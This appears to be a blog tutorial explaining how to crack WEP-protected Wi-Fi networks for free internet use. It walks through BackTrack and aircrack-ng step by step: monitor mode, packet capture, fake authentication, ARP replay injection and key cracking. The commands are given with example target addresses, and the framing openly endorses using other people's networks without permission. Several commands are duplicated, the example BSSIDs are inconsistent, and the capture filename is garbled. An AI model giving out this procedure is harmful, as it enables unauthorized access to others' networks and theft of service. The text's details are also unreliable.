Today's world is the world of information technology and internet .Internet is needed everywhere .Internet has become the part of our life.we can talk with friends ,play games ,earn money ,study and do many more things through internet .The main thing is that internet is not free u have to pay money for using Internet.but you can use it freely.I m going to explain.
Note:-The instruction below is for wep encyrpt wifi security. for wpa and wpa/psk2 i would share later..........
few terminology you need to know
- wep: Wired Equivalent Privacy has weaker security than wpa and wpa/psk2
- AP : stands for Access Point or a wireless router .
- MAC Address : stands for ;Media Access Control ,its a unique address , It is in the Hexadecimal format like 00:5B:6B:2F:78:C8 .
- BSSID : It is the AP Mac Address.
- ESSID : It shows the AP broadcasting name
- download Backtrack
- A wifi catching devices if u are from desktop ,if laptop then not needed
step1 :
- After downloading backtrack iso u need to make it bootable .
- you can make bootable either in your usb devices or dvd drive choice is yours.
- download this software for making bootable either try this one
- Boot your computer from usb or dvd drive.
- after some time you will see linux desktop .
- now click console at left top corner which is like command mode in window
type the following code that are present in red color in your linux console.
1) type: ifconfig wlan0 up (where wlan0 is the name of the wireless card)
then type: iwconfig wlan0
then type: iwconfig wlan0
2) Now Putting your WiFi Adapter on Monitor Mode
just open new console and enter the command below
just open new console and enter the command below
airmon-ng start (your interface)
type :- airmon-ng start wlan0
3) Finding a suitable Target
aireplay-ng - 1 3 -a (bssid of the target ) (interface)
aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
After putting your card into monitor mode,You can discover the surrounding networks by entering the following command
type:- airodump-ng mon0
4) Attacking the Target
Now to crack the WEP key you will have to capture the targets data into a file, To make this we apply airodump tool .
airodump-ng mon0 --bssid -c (channel ) -w (save to f )
As my target is broadcasted in channel 6 and has a bssid "98:fc:1a:c9:14:22" ,I type following syntax and save the captured data as "shiva"
type :- airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w shiva
5) Now Speed up the cracking Using Aireplay
Now you will have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then begin capturing the data packets but this process is very slow, it could take a long time or even weeks to gather that many data packets
The second technique would be an (active attack )this technique is fast and only takes minutes to gather and inject that numerous packets .
In an active attack you'll have do a Fake authentication (associate) with the AP ,then you will have to accumulate and inject packets. These could be done easily by entering the below statements.
aireplay-ng - 1 3 -a (bssid of the target ) (interface)
type:-aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
Afterward doing a fake authentication ,now its time to get and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands
aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
again type aireplay-ng 3 -b 98:fc:11:c9:14:12 -h 10:c0:ca:50:f8:32 mon0
look until it gains 20000 packets , best would be to look until it achieves about 50,000 to 60,000 packets
6) Cracking WEP key using Aircrack
Now its time crack the WEP key from the captured data, write the following syntax in a new konsole to crack the WEP key
aircrack-ng (name of the file )
aircrack-ng (name of the file )
type:-aircrack-ng shiva-0.1-cap
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